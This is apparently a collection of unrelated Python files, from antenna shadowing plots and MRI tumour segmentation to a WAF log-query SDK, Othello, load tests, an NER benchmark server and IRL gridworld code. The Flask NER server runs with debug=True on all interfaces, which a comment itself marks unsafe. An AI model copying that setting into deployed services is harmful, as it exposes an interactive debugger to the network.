            # 10% margin around the extreme positions.
            xmin = 1.1 * min(xa)
            xmax = 1.1 * max(xa)
            ymin = 1.1 * min(ya)
            ymax = 1.1 * max(ya)
        pl.clf()
        pl.plot(xa,ya,"ro")
        pl.xlabel("X (meter)")
        pl.ylabel("Y (meter)")
        pl.xlim(xmin,xmax)
        pl.ylim(ymin,ymax)
        index=0
        # Label each antenna with its name.
        for ant in name:
            pl.text(xa[index],ya[index],ant)
            index+=1
        pl.text(xmin*0.9,ymax*0.9,title)
        pl.show()
class report:
    """
    Meta-class to create all the plots and reports.
    """

    def __init__(self, directoryFile, reportType):
        """
        directoryFile : directory/file the report is generated from
        reportType : kind of report to produce
        """
        self.directoryFile = directoryFile
        # Bug fix: the original read 'self.reportType-reportType' — a
        # subtraction (TypeError for strings) instead of an assignment, so
        # the attribute was never set.
        self.reportType = reportType
        # Observing band number -> representative frequency.
        self.band = {'3':'100GHz','6':'230GHz','7':'345GHz','9':'675GHz'}

    def create(self, filename):
        """
        Create the report,text+plots+simuls, according to the reportType
        filename : Antenna Configuration file
        (Not implemented yet.)
        """
        pass
########################Main program####################################
if __name__=="__main__":
    " main program"
    # Example run: shadowing fraction vs. declination for a 2h track with the
    # C32 compact configuration, declinations -75..25 deg in steps of 2 deg.
    a=Shadowing()
    dec,shad=a.curveShadowingDeclination('C32-cpt.cfg','2h',-75,25,2)
    a.plotShadowingDeclination(dec,shad)
    # Persist the curve so it can be re-plotted without re-simulating.
    out=open("shadowingDec-2h.pickle","wb")
    data={'dec':dec,'shad':shad}
    pickle.dump(data,out)
    out.close()
    #f=figures()
    #f.arrayConfig("Pads.cfg",-1000,1000,-1000,1000)
    #f.arrayConfig("extendedCycle0.cfg",-210,270,-240,240)
|
import os
import sys
sys.path.append('..')
from glob import glob
from DeepBrainSeg.registration import Coregistration
from DeepBrainSeg.helpers.dcm2niftii import convertDcm2nifti
from DeepBrainSeg.brainmask.hdbetmask import get_bet_mask
from DeepBrainSeg.tumor import tumorSeg
# One-time setup: image registration helper and tumor segmentation model.
coreg = Coregistration()
segmentor = tumorSeg()

dcm_subject_root = '../sample_volume/dcm/all_patients'
dcm_subjects = [os.path.join(dcm_subject_root, sub) for sub in os.listdir(dcm_subject_root)]

for subject in dcm_subjects:
    # Hoisted: the subject basename was recomputed many times via
    # subject.split('/').pop(); compute it once per subject.
    subject_name = os.path.basename(subject)

    # Map DICOM sequence directories to modality keys by folder-name patterns.
    # (Renamed from 'json' to avoid shadowing the stdlib module name.)
    modality_paths = {}
    for seq in os.listdir(subject):
        if 'sT1W_FS 3D_ISO_COR' in seq:
            modality_paths['t1c'] = os.path.join(subject, seq)
        elif 'T2W_FLAIR_TRA' in seq:
            modality_paths['flair'] = os.path.join(subject, seq)
        elif 'VT1W_3D_FFE' in seq:
            modality_paths['t1'] = os.path.join(subject, seq)
        elif 'T2W_TSE_TRA' in seq:
            modality_paths['t2'] = os.path.join(subject, seq)

    # 1) Convert the DICOM series to NIfTI volumes.
    convertDcm2nifti(path_json = modality_paths,
                     output_dir = os.path.join('../sample_results/nifty/', subject_name),
                     verbose = True)

    # 2) Skull stripping (HD-BET) for every available modality.
    for key in modality_paths:
        get_bet_mask(os.path.join('../sample_results/nifty/', subject_name, key + '.nii.gz'),
                     '../sample_results/skull_strip/{}/'.format(subject_name),
                     device = 'cpu')

    # 3) Co-register t1/t2/flair onto the contrast-enhanced T1 (t1c).
    skull_strip = '../sample_results/skull_strip/{}/{}.nii.gz'
    moving_imgs = {m: skull_strip.format(subject_name, m) for m in ('t1', 't2', 'flair')}
    fixed_img = skull_strip.format(subject_name, 't1c')
    coreg.register_patient(moving_images = moving_imgs,
                           fixed_image = fixed_img,
                           save_path = '../sample_results/coreg/{}'.format(subject_name))

    # 4) Tumor segmentation on the co-registered, isotropic volumes.
    iso = '../sample_results/coreg/{}/isotropic/{}.nii.gz'
    segmentor.get_segmentation(iso.format(subject_name, 't1'),
                               iso.format(subject_name, 't2'),
                               iso.format(subject_name, 't1c'),
                               iso.format(subject_name, 'flair'),
                               '../sample_results/segmentations/{}/'.format(subject_name))
|
"""
bottle:
Lightweight Python web framework - http://bottlepy.org/docs/dev/
recorder:
Module for manipulating records of hours worked
Record
Object that simulates a single record of work done
RecordMalFormedException
Wrapped exception used internally by the Record class to signal a malformed record
crypto:
Module for passing encrypted data to a remote logging server
labeler:
Module for consistently labeling HTML elements as they pertain to modeling records
color_printer:
Module for printing in color within Python
""" |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class WafQueryAttackDetailsRequest(JDCloudRequest):
    """
    Query the details of WAF attack records.
    """

    def __init__(self, parameters, header=None, version="v1"):
        # POST to the fixed /wafAttackDetails endpoint; parameters carries a
        # WafQueryAttackDetailsParameters instance.
        super(WafQueryAttackDetailsRequest, self).__init__(
            '/wafAttackDetails', 'POST', header, version)
        self.parameters = parameters
class WafQueryAttackDetailsParameters(object):
    """Parameter holder for WafQueryAttackDetailsRequest; every field is
    optional and defaults to None."""

    def __init__(self, ):
        """
        Initialize all query parameters to None (unset).
        """
        self.startTime = None   # query window start (UTC)
        self.endTime = None     # query window end (UTC)
        self.domain = None      # domain to query
        self.sortField = None   # field to sort by
        self.sortRule = None    # 'desc' or 'asc'
        self.pageNumber = None  # 1-based page number
        self.pageSize = None    # page size (server default: 20)

    def setStartTime(self, startTime):
        """
        :param startTime: (Optional) Query start time in UTC, format
            yyyy-MM-dd'T'HH:mm:ss'Z', e.g. 2018-10-21T10:00:00Z
        """
        self.startTime = startTime

    def setEndTime(self, endTime):
        """
        :param endTime: (Optional) Query end time in UTC, format
            yyyy-MM-dd'T'HH:mm:ss'Z', e.g. 2018-10-21T10:00:00Z
        """
        self.endTime = endTime

    def setDomain(self, domain):
        """
        :param domain: (Optional) Domain to query; must be a domain the
            user's pin has permission for.
        """
        self.domain = domain

    def setSortField(self, sortField):
        """
        :param sortField: (Optional) Field to sort the results by.
        """
        self.sortField = sortField

    def setSortRule(self, sortRule):
        """
        :param sortRule: (Optional) Sort order: desc or asc.
        """
        self.sortRule = sortRule

    def setPageNumber(self, pageNumber):
        """
        :param pageNumber: (Optional) Page number, starting from 1.
        """
        self.pageNumber = pageNumber

    def setPageSize(self, pageSize):
        """
        :param pageSize: (Optional) Page size, default 20.
        """
        self.pageSize = pageSize
|
# -*- coding: utf-8 -*-
'''
python2 hello-caffe.py
---or---
python3 hello-caffe.py
'''
from __future__ import print_function
import os, sys
def hello_world():
    """Import pycaffe and report its version (may core-dump if caffe is broken)."""
    import caffe
    print('pycaffe version: %s' % caffe.__version__)
def insert_syspath(p):
    """Prepend *p* to sys.path if it exists; return True on success."""
    if not is_path_exist(p):
        return False
    print('insert {} into sys path'.format(p))
    sys.path.insert(0, p)
    return True
def get_python_version():
    ''' return version string of python, e.g. "3.10" '''
    major, minor = sys.version_info[:2]
    return '{}.{}'.format(major, minor)
def is_path_exist(p):
    """Return True iff the filesystem path *p* exists (file or directory)."""
    return os.path.exists(p)
def init():
    """Locate a pycaffe build and prepend it to sys.path.

    Tries $CAFFE_ROOT/python first, then a hard-coded Intel-caffe checkout
    under $HOME. Returns True if a path was inserted, False otherwise.
    """
    env_caffe_root = os.environ.get('CAFFE_ROOT')
    if not env_caffe_root:
        print('no CAFFE_ROOT')
        return False
    primary = '{}/python'.format(env_caffe_root)
    if insert_syspath(primary):
        print('insert syspath successfully')
        return True
    # Fallback: a conventional source checkout location under $HOME.
    fallback = '{}/{}/python'.format(os.environ['HOME'], 'src/github/intel/caffe')
    if insert_syspath(fallback):
        print('2nd try insert syspath successfully')
        return True
    return False
def main():
    """Entry point: set up sys.path for pycaffe, then optionally exercise it."""
    if not init():
        print('failed to import pycaffe...')
        return
    print('import pycaffe successfully')
    print('Would you like to call caffe function? will core dump a lot')
    prompt = 'enter "yes" to continue: '
    # Python 2's input() would eval the answer, so use raw_input there.
    if float(get_python_version()) > 3.0:
        answer = input(prompt)
    else:
        answer = raw_input(prompt)
    if answer == 'yes':
        hello_world()
# Run only when executed as a script, not on import.
if __name__ == '__main__':
    main()
|
from enum import Enum, unique
import copy
@unique
class Dirn(Enum):
    """The eight step directions on the board as (row_delta, col_delta)."""
    UP = (-1, 0)
    DOWN = (1, 0)
    LEFT = (0, -1)
    RIGHT = (0, 1)
    UPL = (-1, -1)
    DOWNR = (1, 1)
    UPR = (-1, 1)
    DOWNL = (1, -1)

    @classmethod
    def values(cls):
        """Return all directions, in declaration order."""
        return list(cls)
@unique
class Shade(Enum):
    """Disk color: dark or light."""
    DARK = "D"
    LIGHT = "L"

    @classmethod
    def values(cls):
        """Return both shades, in declaration order."""
        return list(cls)

    def opposite(self):
        """Return the other shade."""
        if self is Shade.DARK:
            return Shade.LIGHT
        return Shade.DARK
class Disk:
    """A single game disk: knows its board position and current shade."""

    def __init__(self, row, col, shade):
        self.row = row
        self.col = col
        self.shade = shade
        # Coordinates of empty cells this disk can flank toward; maintained
        # externally (by the board's move/capture logic).
        self.flank_pairs = []

    def __str__(self):
        return self.shade.value

    def flip(self):
        """Turn the disk over to the opposite shade."""
        self.shade = self.shade.opposite()
class Cell:
    """One square of the board; holds at most one disk."""

    def __init__(self, row, col):
        self.row = row
        self.col = col
        self.disk = None

    def __str__(self):
        if self.disk is None:
            return "| |"
        return "|" + str(self.disk) + "|"

    def put(self, disk):
        """Place *disk* in the cell; a None argument is ignored."""
        if disk is not None:
            self.disk = disk

    def empty(self):
        """True iff no disk occupies the cell."""
        return self.disk is None
class Board:
    """
    8x8 Othello/Reversi board: owns the Cell grid, tracks the dark and light
    disks, and implements move validation and capture.
    """
    SIZE = 8
    HEADER = "------------------------"

    def __init__(self):
        self.cells = [[Cell(row, col) for col in range(Board.SIZE)]
                      for row in range(Board.SIZE)]
        # Standard opening position: two dark, two light disks in the center.
        self.cells[3][3].put(Disk(3, 3, Shade.DARK))
        self.cells[3][4].put(Disk(3, 4, Shade.LIGHT))
        self.cells[4][3].put(Disk(4, 3, Shade.LIGHT))
        self.cells[4][4].put(Disk(4, 4, Shade.DARK))
        # Live per-shade disk lists, kept in sync by update()/capture().
        self.ddisks = [self.cells[3][3].disk, self.cells[4][4].disk]
        self.ldisks = [self.cells[3][4].disk, self.cells[4][3].disk]
        # Number of still-empty cells.
        self.spaces = Board.SIZE ** 2 - 4

    @staticmethod
    def in_bounds(row, col):
        """True iff (row, col) lies on the board."""
        return (row >= 0 and row < Board.SIZE) and (col >= 0 and col < Board.SIZE)

    @staticmethod
    def sameas(row1, col1, row2, col2):
        """True iff the two coordinate pairs are identical."""
        return (row1 == row2) and (col1 == col2)

    def draw(self):
        """Print the board to stdout, one row per line, framed by HEADER."""
        print(Board.HEADER)
        for row in range(Board.SIZE):
            for col in range(Board.SIZE):
                print(self.cells[row][col].__str__(), end="")
            print("\n" + Board.HEADER)

    def copy_board(self):
        """Return a copy of this board with deep-copied cells.

        NOTE(review): the copy's ddisks/ldisks still point at the fresh
        Board()'s initial center disks, not at the deep-copied cells —
        confirm callers only use the copy's .cells.
        """
        board_copy = Board()
        board_copy.cells = copy.deepcopy(self.cells)
        return board_copy

    def in_dlist(self, dlist, row, col):
        """True iff (row, col) matches the first two fields of any entry in dlist."""
        return any(Board.sameas(row, col, d[0], d[1])
                   for d in dlist)

    def valid_moves(self, shade):
        """Return the set of (row, col) cells where *shade* may legally play.

        Side effect: records each such cell in the flanking disk's
        flank_pairs list, which capture() later consumes.
        """
        moveset = set()
        cdisks = self.ldisks if shade is Shade.LIGHT else self.ddisks
        for dirn in Dirn.values():
            for cdisk in cdisks:
                opp = 0
                # Walk away from cdisk over a run of opponent disks.
                c_row, c_col = cdisk.row + dirn.value[0], cdisk.col + dirn.value[1]
                while (Board.in_bounds(c_row, c_col) and
                       not self.cells[c_row][c_col].empty() and
                       self.cells[c_row][c_col].disk.shade is shade.opposite()):
                    opp += 1
                    c_row, c_col = c_row + dirn.value[0], c_col + dirn.value[1]
                #Only add if loop broken since reached empty cell
                if (Board.in_bounds(c_row, c_col) and
                        self.cells[c_row][c_col].empty() and
                        opp > 0):
                    moveset.add((c_row, c_col))
                    cdisk.flank_pairs.append((c_row, c_col))
        return moveset

    def capture(self, disk):
        """Flip every opponent disk flanked between *disk* and its partners."""
        cdisks = self.ldisks if disk.shade is Shade.LIGHT else self.ddisks
        for cdisk in cdisks:
            if (disk.row, disk.col) in cdisk.flank_pairs:
                # Unit step from the newly placed disk toward the flanker.
                rdf, cdf = cdisk.row - disk.row, cdisk.col - disk.col
                if rdf != 0:
                    rdf = int(rdf / abs(rdf))
                if cdf != 0:
                    cdf = int(cdf / abs(cdf))
                c_row, c_col = disk.row + rdf, disk.col + cdf
                while (c_row, c_col) != (cdisk.row, cdisk.col):
                    opp = self.cells[c_row][c_col].disk
                    # Move the flipped disk between the per-shade lists.
                    if disk.shade is Shade.LIGHT:
                        self.ldisks.append(opp)
                        self.ddisks.remove(opp)
                    else:
                        self.ddisks.append(opp)
                        self.ldisks.remove(opp)
                    opp.flip()
                    if c_row != cdisk.row:
                        c_row = c_row + rdf
                    if c_col != cdisk.col:
                        c_col = c_col + cdf
                cdisk.flank_pairs.remove((disk.row, disk.col))

    def update(self, row, col, shade):
        """Place a new disk of *shade* at (row, col) and resolve captures."""
        self.cells[row][col].put(Disk(row, col, shade))
        if shade is Shade.LIGHT:
            self.ldisks.append(self.cells[row][col].disk)
        else:
            self.ddisks.append(self.cells[row][col].disk)
        self.spaces -= 1
        self.capture(self.cells[row][col].disk)

    def winner(self):
        """Return the Shade with more disks on the board, or None on a tie."""
        lq, dq = len(self.ldisks), len(self.ddisks)
        if lq == dq:
            return None
        return Shade.LIGHT if lq > dq else Shade.DARK
|
import logging
import random
import uuid
import json
from json import JSONDecodeError
from locust import HttpUser, task, between, events
logging.basicConfig(level=logging.INFO)

# IDs of the staging forms dedicated to performance testing.
formIDs = ["28","29","30","31"]

# Canned answers per form. Field "2" is overwritten with a unique id per
# submission at runtime so individual submissions can be tracked end-to-end.
formSubmissions ={
    "28":{
        "2": "Performance Testing",
        "3": "performance.testing@cds-snc.ca",
        "4": "Ontario",
        "formID": "28"
    },
    "29":{
        "2": "Performance Testing",
        "3": "performance.testing@cds-snc.ca",
        "4": "Alberta",
        "formID": "29"
    },
    "30":{
        "2": "Performance Testing",
        "3": "performance.testing@cds-snc.ca",
        "4": "New Brunswick",
        "formID":"30"
    },
    "31":{
        "2": "Performance Testing",
        "3": "performance.testing@cds-snc.ca",
        "4": "British Columbia",
        "formID": "31"
    }
}
class FormUser(HttpUser):
    """Simulated user for Test 1 (high hit count): hit the landing page,
    open one of the performance-testing forms, submit a response, then view
    the confirmation page."""

    wait_time = between(3,10)
    host = "https://forms-staging.cdssandbox.xyz"
    # Class-level accumulator shared across all simulated users.
    formDataSubmissions = {"success":[], "failed":[]}

    @classmethod
    def on_test_stop(cls):
        """Dump the success/failure submission ids when the test stops."""
        # Fix: the first parameter of a classmethod was named 'self'; it is
        # bound to the class, so name it 'cls'. Also use a context manager so
        # the file is closed even if json.dump raises.
        # NOTE(review): confirm this hook is actually registered with
        # locust's test_stop event — defining it on the class alone may not
        # wire it up.
        with open("/tmp/form_completion.json", "w") as output_file:
            json.dump(cls.formDataSubmissions, output_file)

    @task
    def formFill(self):
        """One full journey: welcome page -> form -> submit -> confirmation."""
        lang = random.choice(["en", "fr"])
        # Get to welcome page
        self.client.get(f"/{lang}/welcome-bienvenue")
        # Go to a form page after
        formID = random.choice(formIDs)
        self.client.get(f"/{lang}/id/{formID}")
        uniqueFormData = formSubmissions[formID]
        # Tag the submission with a unique id so it can be tracked end-to-end.
        uniqueFormData["2"] = uuid.uuid4().hex
        # Submit the form
        with self.client.post("/api/submit", json=uniqueFormData, name=f"/api/submit?{formID}", catch_response=True) as response:
            try:
                if response.json()["received"] != True :
                    self.formDataSubmissions["failed"].append(uniqueFormData["2"])
                    response.failure(f"Submission failed for formID {formID}")
                else:
                    self.formDataSubmissions["success"].append(uniqueFormData["2"])
            except JSONDecodeError:
                self.formDataSubmissions["failed"].append(uniqueFormData["2"])
                response.failure("Response could not be decoded as JSON")
            except KeyError:
                self.formDataSubmissions["failed"].append(uniqueFormData["2"])
                response.failure("Response did not have the expected receive key")
        # Go to confirmation page
        self.client.get(f"/{lang}/id/{formID}/confirmation")
# Admin Users tests:
#
# Test 1: Low hit count
# Login to Admin
# Create form (upload)
# Update form text (id/settings/)
# Delete form (id/settings)
#
# Test 2: Med hit count
# Login to Admin
# Go to Form Templates list (view-templates)
#
# Test 3: Low hit count
# Login to Admin
# Go to Feature Flags
#
# Test 4: High hit count
# Login to Admin
# Retrieve responses for form
#
# Test 5: High hit count
# Login to Admin
# Got to dashboard
|
import logging
import os
import sys
import time
import boto3
from datadog import statsd
from sqsworkers.crew import Crew
# Datadog statsd configuration for this test run.
statsd.namespace = 'dtech.sqs.workers'
statsd.constant_tags.append('sqs-workers-test')
statsd.host = 'statsd.domain.dev.atl-inf.io'

# 'message' logger echoes processed SQS messages to stdout at DEBUG level.
msg_logger = logging.getLogger('message')
msg_logger.setLevel(logging.DEBUG)
std_logger = logging.StreamHandler(sys.stdout)
std_logger.setLevel(logging.DEBUG)
msg_logger.addHandler(std_logger)
app_logger = logging.getLogger('default')
class MsgProcessor():
    """Minimal message processor for Crew: logs the body, then deletes the
    message from the queue."""

    def __init__(self, msg):
        self.msg = msg
        msg_logger.error('--------------------')
        msg_logger.error('msg processor instantiated')
        msg_logger.error('--------------------')

    def start(self):
        """Log the SQS message body and delete it from the queue."""
        msg_logger.error('--------------------')
        msg_logger.error('message body:')
        msg_logger.error('"%s"' % self.msg.body)
        msg_logger.error('message processed')
        msg_logger.error('--------------------')
        self.msg.delete()
def test_crew_with_one_worker():
    """Spin up a single-worker Crew against the dev queue for ~3 seconds."""
    session = boto3.session.Session(
        region_name='us-east-1',
        aws_access_key_id=os.environ.get('AWS_ACCESS_KEY_ID'),
        aws_secret_access_key=os.environ.get('AWS_SECRET_ACCESS_KEY'),
        aws_session_token=os.environ.get('AWS_SESSION_TOKEN'),
    )
    crew = Crew(
        sqs_session=session,
        queue_name='hydra-ddev-test-queue',
        MessageProcessor=MsgProcessor,
        logger=msg_logger,
        statsd=statsd,
        sentry=None,
        worker_limit=1,
    )
    crew.start()
    time.sleep(3)
    crew.stop()
test_crew_with_one_worker()
|
import argparse
import json
import logging
import os
import pdb
import sys
import time
import requests
from flask import Flask, abort, jsonify, make_response, request
from flask_cors import CORS
from memory_profiler import memory_usage, profile
from config import SetupParameters
from transner import Transner
app = Flask(__name__)
cors = CORS(app)

# The NER model is loaded in __main__ and shared with handlers via this dict.
model_dict = {'NERmodel': None}

os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
_USE_CUDA=True
_N_GPUS = 3
# Expose GPUs 0.._N_GPUS-1 to CUDA.
os.environ["CUDA_VISIBLE_DEVICES"]=','.join([str(i) for i in range(_N_GPUS)])
_USE_QUANTIZE=False
_BATCH_SIZE=8
@app.route('/transner/v0.7/benchmarks', methods=['POST'])
def benchmarks():
    """Benchmark endpoint: measure memory and wall-clock cost of do_ner.

    Replicates the first posted string _BATCH_SIZE times, runs do_ner 10
    times and returns min/max/avg memory plus average execution time as a
    JSON-encoded string.
    """
    device = 'GPU' if _USE_CUDA else 'CPU'
    # assumes the request body is {"strings": [...]} — TODO confirm with callers
    test_string = request.get_json()['strings'][0]
    sentence_len = len(test_string.split())
    # Duplicate the sentence to simulate a fixed-size batch.
    test_array = [test_string for _ in range(_BATCH_SIZE)]
    print('device={}; batch={}; sentence_len={}'.format(device, _BATCH_SIZE, sentence_len))
    exec_times = []
    mem_usages = []
    for iteration in range(10):
        print('------- RUN #{} -------'.format(iteration+1))
        start = time.time()
        # memory_usage runs do_ner(test_array) and samples its memory (MiB).
        curr_mem_usage = memory_usage((do_ner, (test_array,)))
        end = time.time()
        mem_usages.append(max(curr_mem_usage))
        exec_times.append(end-start)
    max_mem = max(mem_usages)
    min_mem = min(mem_usages)
    avg_mem = sum(mem_usages)/len(mem_usages)
    avg_ms = sum(exec_times) / len(exec_times)
    # Split the average duration (seconds) into minutes/seconds/milliseconds.
    m_count = (avg_ms/60) % 60
    s_count = avg_ms % 60
    ms_count = avg_ms - int(avg_ms)
    mem_str='max_mem={} MiB; min_mem={} MiB; avg_mem={} MiB'.format(round(max_mem), round(min_mem), round(avg_mem))
    time_str='execution time: {}m:{}s:{}ms'.format(round(m_count), round(s_count), int(ms_count*1000))
    print(mem_str)
    print(time_str)
    print('---------------------')
    return jsonify('{} {}'.format(mem_str, time_str)), 200
@profile
def do_ner(raw_input_strings):
    """Run the shared NER model over *raw_input_strings* and return its
    entity dict (regex and gazetteer post-processing enabled)."""
    ner_model = model_dict['NERmodel']
    # Clear the preprocesser's internal state from any previous request.
    ner_model.reset_preprocesser()
    return ner_model.ner(raw_input_strings, apply_regex=True, apply_gazetteers=True)
@app.errorhandler(404)
def not_found(error):
    """Return a JSON 404 body instead of Flask's default HTML error page."""
    payload = jsonify({'error': 'Not found'})
    return make_response(payload, 404)
if __name__ == '__main__':
    # CLI: --port is the only (required) argument.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--port',
        type=int,
        required=True,
        help='Port to allocate for the rest api'
    )
    args = parser.parse_args()
    # Load the NER model once at startup and share it through model_dict.
    model_dict['NERmodel'] = Transner(pretrained_model=SetupParameters['PRETRAINED_MODEL'],
                                      quantization=_USE_QUANTIZE,
                                      use_cuda=_USE_CUDA,
                                      n_gpus=_N_GPUS)
    # NOTE(review): debug=True is unsafe outside development — confirm.
    app.run(host='0.0.0.0', debug=True, port=args.port)
|
#!/usr/bin/env python
import gridworld as W
import maxent as M
import plot as P
import trajectory as T
import solver as S
import optimizer as O
import mce_irl as I
# import frozenlake_mce_irl as I
import numpy as np
import matplotlib.pyplot as plt
import os
import time
def get_policy(start):
    """Placeholder for policy extraction from *start*; not implemented yet."""
    pass
def sttl_goal_reach(D, goal):
    '''
    Estimate the robustness of the StTL goal-reaching formula
        F[0, T] (Pr[pos = goal] > threshold)
    D    : demonstration trajectories; each has a ._t list of (s, a, s')
           transitions.
    goal : sequence whose first element is the goal state id.
    Returns prob - threshold, where prob is the fraction of trajectories
    that reach the goal within end_time steps.
    '''
    goal = goal[0]
    end_time = 12
    threshold = 0.99
    formula = "F[0,{}] (Pr[pos = goal] > {})".format(end_time, threshold)
    print("StTL goal-reach formula: ", formula)
    count = 0
    n_samples = len(D)
    # Guard against an empty demonstration set (would divide by zero).
    if n_samples == 0:
        return -threshold
    for sample in D:
        transitions = sample._t
        # Reconstruct the visited-state sequence from (s, a, s') transitions.
        visited = [t[0] for t in transitions]
        if transitions:
            visited.append(transitions[-1][-1])
        # Bug fix: the original called visited.index(goal) unconditionally,
        # raising ValueError for any trajectory that never reached the goal.
        if goal in visited and visited.index(goal) <= end_time:
            count += 1
    prob = (count / n_samples)
    rho = prob - threshold
    return rho
def get_d2obs(policy, avoid_states):
    """Return, for every state in *policy*, its distance to the closest
    obstacle in *avoid_states* (|state - obstacle| on the flattened grid).

    States are compared as scalars; an empty *avoid_states* yields
    ``float('inf')`` for every entry.
    """
    return [
        min((abs(state - obstacle) for obstacle in avoid_states),
            default=float("inf"))
        for state in policy
    ]
def sttl_obstacle_avoid(D, goal, avoid_states):
    '''
    G (Pr[dist2obs > dmin] > 0.99)

    Empirical robustness of the StTL obstacle-avoidance property: the
    fraction of sampled trajectories that ALWAYS stay farther than ``dmin``
    from every obstacle, minus the probability threshold.

    :param D: iterable of trajectory samples exposing ``_t`` (transitions).
    :param goal: sequence whose first element is the goal state (kept for
        signature compatibility; unused here).
    :param avoid_states: obstacle states to stay away from.
    :return: robustness ``P(always safe) - threshold``.
    '''
    goal = goal[0]
    threshold = 0.99
    dmin = 2
    formula = "G (Pr[dist2obs > {}] > {})".format(dmin, threshold)
    print("StTL obstacle-avoidance formula: ", formula)
    count = 0
    n_samples = len(D)
    for sample in D:
        transitions = sample._t
        # states visited: source of each transition plus final destination
        visited = [transition[0] for transition in transitions]
        visited.append(transitions[-1][-1])
        d2obs = np.array(get_d2obs(visited, avoid_states))
        # the trajectory violates the property if it ever comes within dmin
        if np.min(d2obs - dmin) <= 0:
            count += 1
    # Bug fix: `count` tallies VIOLATING trajectories, but the original code
    # used count / n_samples directly as the satisfaction probability (the
    # same expression copy-pasted from sttl_goal_reach, where count tallies
    # satisfying samples). The satisfaction probability is the complement.
    prob = 1.0 - (count / n_samples)
    rho = prob - threshold
    return rho
def main():
    """Learn rewards via MCE-IRL on a slippery grid-world, then derive a
    stochastic policy from the learned reward via value iteration.

    The StTL robustness checks over sampled trajectories are currently
    commented out at the bottom of this function.
    """
    # Grid-world setup parameters
    grid_size = 8  # grid-world size
    p_slip = 0.2  # slip. with probability p_slip, agent chooses other 3 actions. Default 0.3
    # avoid_states = [7, 9, 11] # for 4x4 Frozenlake
    # avoid_states = [19, 29, 35, 41, 42, 49, 52, 54, 59] # for 8x8 Frozenlake
    # avoid_states = [3, 8, 13, 11, 16, 21]
    # avoid_states = [7, 12] # 5x5
    # avoid_states = [17, 24, 31] # 7x7
    # avoid_states = [2, 3, 4, 9, 10, 11, 37, 38, 39, 44, 45, 46]
    # avoid_states = [9]
    # avoid_states = [2, 7, 22]
    avoid_states = [3, 9, 12, 14, 17, 18, 22, 27, 37, 43]
    '''
    Ground-truth MDP reward:
    1. reaching the goal gets a reward of +10
    2. reaching avoid-region gets reward 0
    3. any other state gets reward of +1
    NOTE: This somehow does not learn with negative rewards (idk why),
    so I manually designed the ground-truth rewards.
    '''
    # Generate MCE-IRL rewards from demonstrations (timed)
    start_time = time.time()
    reward_mce, world, goal = I.mce_irl(grid_size, p_slip, avoid_states)
    end_time = time.time()
    print("Execution time in s: %.3f" %(end_time - start_time))
    discount = 0.99  # same as gamma for value iteration. Default 0.7
    value = S.value_iteration(world.p_transition, reward_mce, discount)
    weighting = lambda x: x**1  # giving importance to sub-optimal actions
    policy = S.stochastic_policy_from_value(world, value, w=weighting)
    policy_exec = T.stochastic_policy_adapter(policy)
    # print("Value\n", value)
    # print("Policy\n", policy)
    # print("Policy Exec\n", policy_exec)
    # Randomly sample policies from the learned reward function
    # D = []
    # np.random.seed(0)
    # n_samples = 20
    # for _ in range(n_samples):
    #     start = np.random.randint(0, 16)
    #     sample = T.generate_trajectory(world, policy_exec, start, goal)
    #     # print("Start: %d, Policy:" %(start))
    #     D.append(sample)
    # print("\nTotal samples: %d\n" %(n_samples))
    # # Compute the robustness of goal-reach STTL
    # rho = sttl_goal_reach(D, goal)
    # print("StTL goal-reach robustness = %.2f\n" % (rho))
    # # Compute the robustness of obstacle avoidance STTL
    # rho = sttl_obstacle_avoid(D, goal, avoid_states)
    # print("StTL obstacle-avoidance robustness = %.2f\n" % (rho))
# Standard script entry point.
if __name__ == "__main__":
    main()
import pandas as pd, numpy as np
import matplotlib.pyplot as plt, seaborn as sns
# Load the Titanic dataset and prepare numeric features for correlation:
# one-hot encode passenger class, binarise sex.
url = 'https://raw.githubusercontent.com/datahackformation/Posts-Python-Tips-Tricks/main/Heatmap/titanic.csv'
df = pd.read_csv(url, sep=';').set_index('PassengerId')
df = pd.get_dummies(df, columns=['Pclass'])
df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})
# --> Heatmap
# Bug fix: `np.bool` was deprecated in NumPy 1.20 and removed in 1.24; the
# builtin `bool` is the documented replacement. Also compute the correlation
# matrix once instead of twice.
# NOTE(review): if the frame still contains non-numeric columns, pandas 2.x
# requires df.corr(numeric_only=True) - confirm against the pinned pandas.
corr = df.corr()
plt.figure(figsize=(16, 6))
# mask the upper triangle so each correlation is shown exactly once
mask = np.triu(np.ones_like(corr, dtype=bool))
sns.heatmap(
    corr,
    mask=mask,
    vmin=-1,
    vmax=1,
    annot=True,
    cmap='rocket'
)
|
"""Models for facial keypoint detection"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import pytorch_lightning as pl
from pytorch_lightning import Callback
from pytorch_lightning.loggers import TensorBoardLogger
class KeypointModel(pl.LightningModule):
    """Facial keypoint detection model.

    A small CNN mapping a batch of (N, 1, 96, 96) grayscale face crops to
    30 outputs: 15 keypoints as (x, y) pairs (see general_step's
    .view(-1, 15, 2)).
    """
    def __init__(self, hparams):
        """
        Initialize your model from a given dict containing all your hparams
        Warning: Don't change the method declaration (i.e. by adding more
        arguments), otherwise it might not work on the submission server
        """
        super().__init__()
        # NOTE(review): assigning directly to self.hparams was removed in
        # newer pytorch-lightning releases (self.save_hyperparameters() is
        # the replacement) - confirm the pinned lightning version.
        self.hparams = hparams
        # Conv/pool/dropout stack; the trailing comments track the activation
        # shape (channels, height, width) after each stage.
        self.model = nn.Sequential(
            nn.Conv2d(1, 32, 5),  #32,92,92
            nn.ReLU(),
            nn.MaxPool2d(2, 2),  #32,46,46
            nn.Dropout(p=0.1),
            nn.Conv2d(32, 64, 4),  #64,43,43
            nn.ReLU(),
            nn.MaxPool2d(2, 2),  #64,21,21
            nn.Dropout(p=0.2),
            nn.Conv2d(64, 128, 3),  #128,19,19
            nn.ReLU(),
            nn.MaxPool2d(2, 2),  #128,9,9
            nn.Dropout(p=0.3),
            nn.Conv2d(128, 256, 2),  #256,8,8
